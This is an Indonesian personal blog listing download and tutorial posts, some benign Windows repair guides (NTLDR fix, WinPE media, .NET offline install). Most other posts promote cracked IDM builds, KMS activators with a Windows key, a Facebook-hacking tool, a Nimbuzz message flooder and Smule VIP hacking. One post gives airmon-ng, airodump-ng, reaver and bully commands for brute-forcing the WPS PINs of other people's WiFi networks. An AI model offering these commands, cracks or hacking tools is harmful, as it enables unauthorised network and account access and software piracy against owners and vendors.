Translate

Navbar Label

Free Download Software Aplikasi Tutorial For YouFree Aplikasi For YouFree Tutorial For You..Free Software For You..Free Game For You...Programming

Thursday, March 23, 2017

C# Audio Spectrum Analyzer [CYBERS-TE4M]

C# Audio Spectrum Analyzer [CYBERS-TE4M]











 Download :


 (SOURCE) C# Audio Spectrum Analyzer [CYBERS-TE4M]






Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Saturday, March 4, 2017

Download IDM 6.27 build 5 Full crack by [CYBERS-TE4M]

Download IDM 6.27 build 5 Full crack by [CYBERS-TE4M]








Silahkan Download Aplikasinya melalui Link di Bawah ini..


Download IDM 6.27 build 5 Full Crack [CYBERS-TE4M]





Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Tuesday, February 28, 2017

Fix NTLDR is Missing Windows 7/8/10

Fix NTLDR is Missing Windows 7/8/10








NTLDR Missing atau rusak pada Windows 7/8/10 ? Jangan khawatir..
Pada saat Admin menulis artikel ni seringlah terjadi hal seperti itu, karena Admin sendiri suka Re-Install windows dan kadang Dual boot..

Masalah ini kadang sering terjadi pada windows, dan masalah admin sendiri adalah saat membuat dual boot Windows 7 dan Windows 10.
Saat menghapus salah satu OS nya maka Windows gagal Boot muncul pesan:

"NTLDR is Missing"
"Press Ctrl+Alt+Del to restart"






Tapi jangan khawatir, hal seperti itu bisa di atasi.
Lalu bagaimana cara mengatasinya ?
Alat yang di butuhkan disini Admin bisa kasih 2 alat buat FIX/Repair yaitu:

1. Installer Windows Baik di buat dengan FDD (Flashdisk) atau DVD installer.
2. WinPE (di buat boot dengan FDD atau DVD terserah)

Yang Admin jelaskan bukan pakai Windows Installer ya, tapi pakai WinPE aja.
cara ini pun bisa di terapkan pakai installer..

Karena Winpe susah/tidak tersedia versi Offline jadi kita harus langsung terhubung ke Microsoft ya buat download filenya..
Namun bisa Offline Installer jika anda sudah mengunduhnya melalui Online tsb.

Karena WinPE sendiri bukan Individual file, jadi Pack/Bundle dengan yang lain, yang tepatnya Windows ADK.
disini Admin pakai Windows 10 ADK..
WinPE sendiri satu bundle dengan Windows ADK, dan untuk download Windows 10 ADK kunjungi situs Microsoft berikut ini:

Windows 10 ADK setup Download







Jika sudah menuju link silahkan pilih versi. klik tombolnya nanti akan Download secara sendirinya.
Jika sudah selesai download klik filenya buat install.
Windows 10 ADK butuh Microsoft NET.framework 4.6.2
Saat install nanti di tanya untuk install NET.framework 4.6.2 secara Online..

Atau anda bisa Mungunduhnya Secara Offline disini:

Unduh Microsoft .NET Framework 4.6.2 offline Penginstal paket sekarang.

Jika sudah selesai terinstall NET.framework 4.6.2 saat install Windows 10 ADK nanti akan muncul seperti ini:




Pilih install seperti gambar, anda juga bisa Men-Download nya saja.. nanti bisa di Install secara Offline.





Lanjut





Pilih/Centang saja 2 pilihan tersebut.
Lalu install..

Jika sudah ter-install dengan benar dan baik.

Klik start Menu Windows cari "Windows kits" Expand/klik.
klik kanan "Deployment ang Imaging Tools" -> "More" -> "Run as administrator"
ikuti seperti gambar:





Nanti muncul Seperti ini:





Tahap selanjutnya tancapkan Flashdisk dan format terlebih dahulu (format seperti biasa)

Jika sudah ketik perintah seperti berikut:

==========================================

Untuk X64:

copype amd64 C:\WinPE_amd64

MakeWinPEMedia /UFD C:\WinPE_amd64 F:

==========================================

Untuk x86:

copype x86 c:\WinPE_x86

MakeWinPEMedia /UFD C:\WinPE_x86 F:

==========================================

"F:" Sesuaikan/Ganti Lokasi Flashdisk anda berada.

==========================================

Tunggu sampai selesai.
Jika sudah selesai, Silahkan Restart Laptop/Komputer nya.
Jangan Lupa Setting boot nya dengan USB Flashdisk, lewat Boot Menu atau melalui BIOS.

==============================================================

NB:
Bahwa type HDD sekarang Rilis Generasi 2. yang saya maksud adalah type HDD:

1. MBR
2. GPT

Saya tidak akan membahas 2 type HDD tsb disini, jadi silahkan cari referensi sendiri tentang 2 type tsb.

==============================================================

Jika berhasil boot melalui Flashdisk akan Muncul pesan:

"Press any key to boot from USB"







Silahkan tekan sembarang tombol, tekan ENTER saja jika masih kurang paham maksud saya.
Pesan itu hanya muncul beberapa detik, jika tidak cepat di tekan Sembarang tombol/ENTER maka Boot dari USB Flashdisk akan gagal, dan akan Boot/Masuk Windows lagi yang Muncul pesan "NTLDR is Missing" lagi.

Jika sudah berhasil Boot dari USB Flashdisk, Nanti Jendela CMD/Command Prompt akan Muncul.

Lalu cukup ketik:

bootsect /nt60 c: /mbr





Ketik lagi:

Exit

buat Restart Komputer nya..
Udah cukup gitu aja..

Gtu aja sob?
iyah gtu ajah.. :)
masa sich..?? :S
Ya ela..h masih banyak tanya dan ga percaya lagi.... :(

di Coba aja dulu..

Semoga berhasil dan membantu anda semua..
jangan Lupa tinggalkan jejak anda di komentar, atau mungkin yang masih gagal. tulis di komentar.


Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Friday, November 4, 2016

Patch IDM 6.26 by [CYBER'S-TE4M]

Patch IDM 6.26 by [CYBER'S-TE4M]








Silahkan Download Aplikasinya melalui Link di Bawah ini..


Download Patch IDM 6.26 NOW


Download IDM 6.26 Here Now







Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Monday, September 5, 2016

C# Windows 10 Activation and Watermark Disable by [CYBER'S-TE4M]

C# Windows 10 Activation and Watermark Disable by [CYBER'S-TE4M]












C# Source Code.

Jika anda tidak ingin resiko pakai Activator, anda bisa Compiler sendiri program'nya dan cara mudah menghilangkan Watermark dan Menon-Aktfikan Windows auto activate.
Dimana jika ragu pakai activator yang mungkin anda pikir bisa mempengaruhi Driver dan System windows.

Catatan:
Setelah install jangan rubah product key, atau jika sudah terlanjur merubah KEY coba install lagi dengan product key dibawah ini:

Windows 10 Profesional Key:

VK7JG-NPHTM-C97JM-9MPGT-3V66T

Pastikan pakai Key di atas untuk Windows 10 pro.
dan ini berlaku untuk:
Windows 7
Windows 8.1
Windows 10

dan jangan lupa reset Trial Windows entah Seminggu/Sebulan sekali.

Saya bagikan C# Source ini secara gratis..
dan untuk tutorial anda bisa simak dalam Video..

Download NOW C# Source







Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Friday, September 2, 2016

Download Virtual Wifi by [CYBER'S-TE4M]

Download Virtual Wifi by [CYBER'S-TE4M]














Free !  Free !  Free !  Free !  Free !  Free !  Free !  Free !  Free !  Free !

Alat pencipta Wifi, jika anda ingin Share Adapter WLAN yang sudah terkoneksi ke jaringan WLAN di Laptop ataupun PC, anda bisa Manfaatkan Software ini..

Anda bisa share jaringan WLAN anda agar bisa di akses dari Handphone/Laptop Lain..

Jika ingin bisa share jaringan LAN, anda harus mempunyai portable wifi, agar bisa memancarkan sinyal wifi untuk di share dari software ini.

Caranya Mudah..
Cukup koneksikan adapter anda ke internet.
Lalu buka Software "Virtual Wifi by [CYBER'S-TE4M]"

Step 1:

- Isi Username
- Isi Password
- Buat Wifi.

Step 2:

- Klik Start Wifi.

Step 3:

- Klik Sharing.

Selesai.
Mudah bukan??

Anda bebas Share Software ini ke siapa saja Baik di Website/Blog/Facebook atau apa aja..


Download NOW Virtual Wifi by [CYBER'S-TE4M]

Yang pertama Packing berbeda, Jika tidak Bekerja silahkan Download Packing yang lain dan bisa anda Download dibawah ini:

Download Virtual Wifi by [CYBER'S-TE4M]

Jangan lupa jalankan sebagai Administrators, dengan klik kanan Software/Program nya

"Run as administrators"

Jika bahasa indonesia:

"Jalankan sebagai administrators"





Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Monday, August 29, 2016

Cara Membuat Aplikasi Patch Dengan Visual Basic 6 by cyber^sholeh

Cara Membuat Aplikasi Patch Dengan Visual Basic 6 by cyber^sholeh











cyber^sholeh Berbagi Tutorial Cara Membuat Aplikasi Patch Dengan Visual Basic 6.

Langsung saja Tonton Videonya....





Project And Source Code :

Download Disini

(pCloud):

Download Project aplikasi patch created by cyber^sholeh.rar

Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Saturday, August 20, 2016

Hack Facebook 2016 With Web Login by CYBER'S TE4M

Hack Facebook 2016 With Web Login by CYBER'S TE4M








Hanya untuk referensi, mohon jangan di salah gunakan..

Jika ingin file jadi Silahkan inbox saya lewat Email atau Facebook..




Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Monday, June 20, 2016

Membuat Bootable WinPE di USB Flash tanpa Download dan install Windows ADK

Membuat Bootable WinPE di USB Flash tanpa Download dan install Windows ADK











Download File nya:

 MEGA

 WinPE Windows 10 x64.ISO (252.4 MB)

 DROPBOX

WinPE Windows 10 x64.ISO (252.4 MB)

__________________________________________

MEGA

RUFUS.zip

DROPBOX

RUFUS.zip

___________________________________________



Jika Sudah selesai Silahkan Setting Boot Option dengan USB Flash..
Selamat mencoba..


Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Monday, May 23, 2016

Hack Wifi 2016 Menggunakan WifiSlax Combination Tools Reaver dan Bully

Hack Wifi 2016 Menggunakan WifiSlax Combination Tools Reaver dan Bully












Download WifiSlax 4.11.1

https://wifislax.en.uptodown.com/ubuntu/download/273429

Open Console (buka console)

1. airmon-ng
2. airmon-ng start wlan0
3. airodump-ng wlan0
CTRL + C
Jika target sudah dapat.

Reaver Command:
reaver -i mon0 -b BSSID/MAC_ADDRESS -vv -K 1

Bully Command:
bully mon0 -b BSSID/MAC_ADDRESS -c(No Channel) -A -E -C -S -v3 -p (PIN) -l 6 -B

Selanjutnya lihat Video..

Jika anda kesulitan Silahkan Hubungi saya atau Follow saya di facebook atau lainya..









Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Sunday, May 22, 2016

Cara Hack VIP Smule 2016

Cara Hack VIP Smule 2016








Kali ini saya berbagi cara Hack VIP Smule 2016 dengan menggunakan HP Android..
Lebih Jelasnya lihat Video, dan untuk Aplikasinya anda bisa download Alatnya melalui Link yang saya sediakan di bawah ini:

King Root 4.8.2.apk


King Root 4.9.0.apk


King Root 4.9.5.apk


Lucky Patcher 6.0.7


Lucky Patcher 6.0.8


Lucky Patcher 6.1.1


Lucky Patcher 6.1.3


Lucky Patcher 6.1.5


Lucky Patcher 6.1.7


Lucky Patcher 6.1.8


Jika anda merasa masih bingung.. anda bisa menemukan saya di Facebook yang ada di banner Samping.
Atau Hubungi saya lewat BBM (5C18C02C)
Atau ikuti saya di Smule (@cybersholeh)





Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)

Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Sunday, August 30, 2015

How to Convert Disk MBR to GPT or GPT to MBR

 How to Convert Disk MBR to GPT or GPT to MBR










Disini saya cuma mau berbagi pengalaman saja.
karena sudah cari referensi kesana kemari ga ketemu dan akhirnya bisa menemukan sendiri caranya.

Masalah ini datang saat mau install OS single Partisis/dual boot namun tidak bisa..
Kenapa?
Karena setelah saya sadari HDD sekarang sudah muncul type GPT,
HDD GPT itu sifatnya Protected/Scure Boot. jadi tidak akan bisa dual Boot/Single Partition.

Lalu bagaimana supaya bisa install dual boot dan single Partisi tanpa ada System Reserved??
setelah selidik tak mungkin bisa kalau tidak di convert dahulu ke MBR, muter-muter deh pokoknya..

Bisa di Convert tapi harus hapus dulu semua data di HDD.. whats???
Ga mungkin deh ! data yang segitu banyak harus gue hapus...
Ga, ga.. pasti ada cara lain ini, lama saya berpikir dan cari cara/Referensi.. tak ketemu jua.
Akhirnya saya nemuin inspirasi dan penemuan saya sendiri.
Dengan kata kita harus hapus satu partisi yang ter'install Windows saja, misal "C"
Tapi bukan yang di "D" atau "E" yang banyak data.. ga mau deh..
tanpa kebetulan jika anda menemukan tutorial ini, berarti anda Beruntung.. :D

Okey lets go tutorial..

Caranya adalah menggunakan Software "Active@ Boot Disk" atau "Active@ Data Studio"
dengan menggunakan Software tersebut maka bisa Convert Harddisk MBR ke GPT atau GPT ke MBR.

Simak Videonya

NB:
Jika di Partisi sudah ter'install OS, Silahkan di Hapus Partisi yang ada OS nya..
Nanti baru bisa sukses Convert..





Download Program Melalui Link dibawah ini :

Active@ Boot Disk Suite 10.0.3 x64 + Key

or

Active@ Data Studio 10.0.3 x64 + Key

Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Active Windows 10 using Activator

Active Windows 10 using Activator








Sampai saat saya Posting artikel ni saya belum menemukan cara aktivasi Windows 10 secara permanen.
Banyak Activator yang bisa mengaktifkan Windows 10. Namun dengan masa trial.

namun tidak apa-apa lah untuk dicoba.

# KMS10 v1.0

KMS10_v1.0




# Windows 10 KMS Activator Ultimate 2015 v1.2

Windows 10 KMS Activator Ultimate 2015 v1.2 Setup







# Windows KMS Activator Ultimate 2015 v2.4

Windows_KMS_Activator_Ultimate_2015_v2.4



KMS Pico

KMS Pico




Sekian dulu..


Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Saturday, August 29, 2015

Offline install Net framework 3.5 on Windows 8/8.1/10

Offline install Net framework 3.5 on Windows 8/8.1/10










METHODE 1 :

# Use Master Windows 8/8.1/10 ISO file or USB Bootable or CD/DVD Drive.

- CD/DVD drive insert to DVD Room. <--

- USB Bootable insert to USB Slot. <--

- ISO File, Mount using Virtual CD. <--

Example use ISO File and Mount to Virtual CD/DVD drive.




Next Step:

Right Click Mouse on Start menu -> Command Prompt (Admin)




Command Prompt (Admin) Open.




Enter Command:



Wait Until process Done!




METHODE 2 :

Using Software NET-Framework-Offline-Installer-v2.3.

Download program here:

NET-Framework-Offline-Installer-v2.3

Insert Master DVD Windows to DVD room drive or USB bootable to USB Slot or ISO file Mount to Virtual CD drive.

 Now Open Program As Administrator.




Next Step




METHODE 3 :

Download Net.3.5 from Link here:

microsoft-windows-netfx3-ondemand-package.cab


Place file to HDD drive. dont place File into Folder.

Example iam Place to HDD Drive on Partition D.

Dont Rename this file.



Right Click Mouse on Start menu -> Command Prompt (Admin)



Enter Command:




Wait until process install done...

Good Luck...


Salam Hangat dari saya cyber^sholeh cah Purwodadi-Jawa Tengah-Indonesia... ;)


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Saturday, February 28, 2015

Download PV Message Flooder Nimbuzz 2015

Download PV Message Flooder Nimbuzz 2015













Kalau ini PV Message Flooder, beda dengan PV Chat..


Berikut Shootnya:




Silahkan Download Melalui Link dibawah ini:

DOWNLOAD PV Message Flooder Nimbuzz 2015


Mungkin Sampai Disini Pertemuan Kita, lain Kali Bisa Kita Sambung lagi, Salam Hangat Dari cyber^sholeh Wonk Purwodadi cxixixixi.....


Jangan Lupa Kunjungi Blog-ku Lainya di Bawah ini :

-=[ SHOLEH4U.JW.LT ]=-

Google Adsense




Selamat Datang di Website cyber^sholeh...
Download Software - Aplikasi - Tutorial Free for you......
Kunjungan Anda Sangat Bermanfaat Bagi Saya....

Powered By cyber^sholeh

Free Download Software Aplikasi Tutorial For You